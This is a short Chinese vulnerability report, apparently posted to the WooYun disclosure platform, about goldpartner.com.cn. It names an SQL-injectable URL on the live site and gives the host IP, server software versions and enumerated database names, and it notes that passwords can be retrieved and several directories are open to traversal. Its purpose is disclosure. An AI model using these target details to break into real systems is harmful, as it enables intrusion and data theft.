今年过节不收礼啊，收礼只收萌大爷。赚了那么多钱，还有个巨人网络，柱哥怎么就不把这个网站搞的好好的呢。。貌似这网站好长时间没更新了，要弃用的话，赶紧关了吧，这样放着多打脸啊。。
详细说明：注入点：http://www.goldpartner.com.cn:80/contact.php?provinceid=2
 
Target:             http://www.goldpartner.com.cn/contact.php?provinceid=2
 
Host IP:             210.13.73.219
 
Web Server:    Apache/2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 mod_perl/2.0.4 Perl/v5.10.1
 
Powered-by:   PHP/5.3.5
 
DB Server:       MySQL
 
Current DB:    hjdd
 
Data Bases:    information_schema
 
                   cdcol
 
                   hjdd
 
                   hjj
 
                   joyuan
 
                   mysql
 
                   performance_schema
 
                   phpmyadmin
 
                   test
 
                   webauth
 
                   zhuanti可得出各种密码。
http://www.goldpartner.com.cn/templates/
http://www.goldpartner.com.cn/images/
http://www.goldpartner.com.cn/data/
http://www.goldpartner.com.cn/include/等等各种遍历。
漏洞证明：
 
 


 
 
修复方案：不用了就关了吧。
 
作者Valo洛洛@乌云